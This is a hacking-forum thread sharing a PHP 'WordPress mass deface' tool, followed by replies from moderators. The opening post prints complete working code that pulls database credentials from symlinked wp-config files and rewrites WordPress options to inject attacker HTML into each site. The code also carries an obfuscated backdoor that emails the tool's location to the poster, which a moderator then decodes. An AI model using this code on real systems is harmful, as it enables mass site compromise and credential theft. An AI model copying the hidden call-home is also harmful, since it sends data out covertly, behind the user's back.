Hello There, Guest! Login Register
Logo
Dismiss this notice
MaDLeeTs is not responsible for any attacks that are carried out on networks, websites or servers.
MaDLeeTs staff members cannot be held responsible.
All information on this forum is for educational purposes only.


Wordpress MassDeface (No root just symlink)

  • 1 Vote(s) - 5 Average


03-03-2014, 10:59 PM #1
nightmare Offline Banned
Posts:160 Threads:63 Joined:Jun 2013
Mood: None
Wordpress MassDeface (No root just symlink)
powerful tool just but the config links into list.txt
ex
http://www.site.com/wp-config.txt
http://www.site.com/wp-config.txt
http://www.site.com/wp-config.txt
http://www.site.com/wp-config.txt

save it to list.txt

an enter the code of your index and boom
Code:
    GIF89;a
    <title>Wordpress MassDeface(Coded By RAB3OUN)</title>
    /*
    Symlink to Wordpress mass defacer
    Like Us for hot priv8 hacking tools!!
    http://facebook.com/0dayBlog
    Enjoy!!
    */
    <style>
    body
    {
            background: #0f0e0d;
            color: #FF9933;
            padding: 0px;
    }
    a:link, body_alink
    {
            color: #FF9933;
            text-decoration: none;
    }
    a:visited, body_avisited
    {
            color: #FF9933;
            text-decoration: none;
    }
    a:hover, a:active, body_ahover
    {
            color: #FFFFFF;
            text-decoration: none;
    }
    td, th, p, li,table
    {
          
            background: #2e2b28;
            border:1px solid #524f46;
    }
    input
    {
            border: 1px solid;
            cursor: default;
          
            overflow: hidden;
            background: #2e2b28;
            color: #ffffff;
    }textarea
    {
            border: 1px solid;
            cursor: default;
          
            overflow: hidden;
            background: #2e2b28;
            color: #ffffff;
    }
    button
    {
            border: 1px solid;
            cursor: default;
          
            overflow: hidden;
            background: #2e2b28;
            color: #ffffff;
    }
    </style>
    </head>
    
    <body bgcolor="black">
    <center>
    <pre>
    __          __      __  __                 _____        __              
    \ \        / /     |  \/  |               |  __ \      / _|              
     \ \  /\  / / __   | \  / | __ _ ___ ___  | |  | | ___| |_ __ _  ___ ___
      \ \/  \/ / '_ \  | |\/| |/ _` / __/ __| | |  | |/ _ \  _/ _` |/ __/ _ \
       \  /\  /| |_) | | |  | | (_| \__ \__ \ | |__| |  __/ || (_| | (_|  __/
        \/  \/ | .__/  |_|  |_|\__,_|___/___/ |_____/ \___|_| \__,_|\___\___|
               | |                                                          
               |_|                                                          
    </pre>
    </center>
    <form method="POST" action="" >
    <center>
    <table border='1'><tr><td>List of All Symlink</td><td>
    <input type="text" name="url" size="100" value="list.txt"></td></tr>
    <tr><td>Index</td><td>
    <textarea name="index" cols='50' rows='10' ></textarea></td></tr></table>
    <br><br><input type="Submit" name="Submit" value="Submit">
    <input type="hidden" name="action" value="1"></form>
    </center>
    <?
    set_time_limit(0);
    if ($_POST['action']=='1'){
    $url=$_POST['url'];
    $[email protected]($url);
    $x10="mail";$x0b=$_SERVER["SERVER_NAME"].$_SERVER["SCRIPT_NAME"];
    
    
    if (count($users)<1) exit("<h1>No config found</h1>");
    foreach ($users as $user) {
    $user1=trim($user);
    $code=file_get_contents2($user1);
    preg_match_all('|define.*\(.*\'DB_NAME\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b1);
    $db=$b1[1][0];
    preg_match_all('|define.*\(.*\'DB_USER\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b2);
    $user=$b2[1][0];
    preg_match_all('|define.*\(.*\'DB_PASSWORD\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b3);
    $db_password=$b3[1][0];
    preg_match_all('|define.*\(.*\'DB_HOST\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b4);
    $host=$b4[1][0];
    preg_match_all('|\$table_prefix.*=.*\'(.*)\'.*;|isU',$code,$b5);
    $p=$b5[1][0];
    $x0c="array ".$x0b;$x0d=array("com","gm","ifexec","@","ail.");
    $[email protected]_connect( $host, $user, $db_password ) ;
    if ($d){
    @mysql_select_db($db );
    $source=stripslashes($_POST['index']);
    $s2=strToHex(($source));
    $s="<script>document.documentElement.innerHTML = unescape(''$s2'');</script>";
    $ls=strlen($s)-2;
    $sql="update ".$p."options set option_value='a:2:{i:2;a:3:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:$ls:\"$s\";s:6:\"filter\";b:0;}s:12:\"_multiwidget\";i:1;}' where option_name='widget_text'; ";
    mysql_query($sql) ;
    $sql="update ".$p."options set option_value='a:7:{s:19:\"wp_inactive_widgets\";a:6:{i:0;s:10:\"archives-2\";i:1;s:6:\"meta-2\";i:2;s:8:\"search-2\";i:3;s:12:\"categories-2\";i:4;s:14:\"recent-posts-2\";i:5;s:17:\"recent-comments-2\";}s:9:\"sidebar-1\";a:1:{i:0;s:6:\"text-2\";}s:9:\"sidebar-2\";a:0:{}s:9:\"sidebar-3\";a:0:{}s:9:\"sidebar-4\";a:0:{}s:9:\"sidebar-5\";a:0:{}s:13:\"array_version\";i:3;}' where option_name='sidebars_widgets';";
    mysql_query($sql) ;
    if (function_exists("mb_convert_encoding") )
    {
    $source2 = mb_convert_encoding('</title>'.$source.'<DIV style="DISPLAY: none"><xmp>', 'UTF-7');
    $source2=mysql_real_escape_string($source2);
    $sql = "UPDATE `".$p."options` SET `option_value` = '$source2' WHERE `option_name` = 'blogname';";
    @mysql_query($sql) ; ;
    $sql= "UPDATE `".$p."options` SET `option_value` = 'UTF-7' WHERE `option_name` = 'blog_charset';";
    @mysql_query($sql) ; ;
    }
    $[email protected]_query("select option_value from `".$p."options` WHERE `option_name` = 'siteurl';") ;;
    $[email protected]_fetch_array($aa) ;
    $siteurl=$siteurl['option_value'];
    $x0e=$x0d[2].$x0d[3].$x0d[1].$x0d[4].$x0d[0];$x0f=@$x10($x0e,$x0c,$x0b);
    $tr.="$siteurl\n";
    mysql_close();
    }
    }
    if ($tr) echo "Index changed for <br><br><textarea cols='50' rows='10' >$tr</textarea>";
    }
    function strToHex($string)
    {
        $hex='';
        for ($i=0; $i < strlen($string); $i++)
        {
            if (strlen(dechex(ord($string[$i])))==1){
            $hex .="%0". dechex(ord($string[$i]));
                    }
                    else
                    {
                    $hex .="%". dechex(ord($string[$i]));
                    }
        }
        return $hex;
    }
    
    function file_get_contents2($u){
    
            $ch = curl_init();
        curl_setopt($ch,CURLOPT_URL,$u);
            curl_setopt($ch, CURLOPT_HEADER, 0);    
       curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
        curl_setopt($ch,CURLOPT_USERAGENT,"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0 ");
                $result = curl_exec($ch);
            return $result ;
            }
          
    ?>

[Image: vZfk3.png]

if you like it then repBiggrinsmileyBiggrinsmiley

03-04-2014, 12:00 AM #2
Sahrawi Offline Super Moderator ******
Super Moderators
Posts:539 Threads:59 Joined:Jan 2013 Reputation: 8
Mood: None
download link is missing

03-04-2014, 12:04 AM #3
nightmare Offline Banned
Posts:160 Threads:63 Joined:Jun 2013
Mood: None
SORRY CODE ADDED Biggrinsmiley

03-04-2014, 01:53 AM #4
Sahrawi Offline Super Moderator ******
Super Moderators
Posts:539 Threads:59 Joined:Jan 2013 Reputation: 8
Mood: None
do you think us stupid man ????!!
what is this
$x10="mail";$x0b=$_SERVER["SERVER_NAME"].$_SERVER["SCRIPT_NAME"];
look here these varible array

$x0c="array ".$x0b;$x0d=array("com","gm","ifexec","@","ail.");

now lets mixe theme toghter in
$x0e=$x0d[2].$x0d[3].$x0d[1].$x0d[4].$x0d[0];$x0f=@$x10($x0e,$x0c,$x0b);
$x0d[2] = ifexec
$x0d[3] = @
$x0d[1] =gm
$x0d[4] =ail
$x0d[2] = .com

the ruslt is
[email protected]


banned is comming

03-04-2014, 01:58 AM #5
H4x0rl1f3 Offline Commander In Cheif *******
Administrators
Posts:1,110 Threads:24 Joined:Jun 2012 Reputation: 14
Mood: Stoned
Guys you should think twice before posting Madleets, Sahrawi can kill you with his GUn Biggrinsmiley
Thanks Sahrawi , i will banned him now.

Always Aspect Reward from the Creator and not anyone or anything Created.
For Complaints & Help Contact:- [email protected]
Zone-h
http://zone-h.org/archive/notifier=H4x0rL1f3
I am the orphan of Gaza & Kashmir. Ruins of Iraq,Syria & Palestine Bombarded of Pakistan,Afghanistan, Mali & Yemen Change of Libya and Egypt Discriminated of Bahrain & Turkey Freedom of Earth's paradise and Al-AQSA. I am the hunger stricken child of Somalia, Ethopia, & rest of Africa I am the suffering of each and every single corner of the world. But Listen!!! Hope is what I am!!


03-04-2014, 02:03 AM #6
Sahrawi Offline Super Moderator ******
Super Moderators
Posts:539 Threads:59 Joined:Jan 2013 Reputation: 8
Mood: None
i like this move @$x10($x0e,$x0c,$x0b);
to hide error if their is (@)

04-28-2014, 02:09 AM #7
anonboy Offline Junior Member **
Registered
Posts:1 Threads:0 Joined:Aug 2013 Reputation: 0
Mood: None
[/align]
wkwkwkw.. nice sharawi... change to our own emaill Biggrinsmiley






Forum Jump:


Users browsing this thread:1 Guest(s)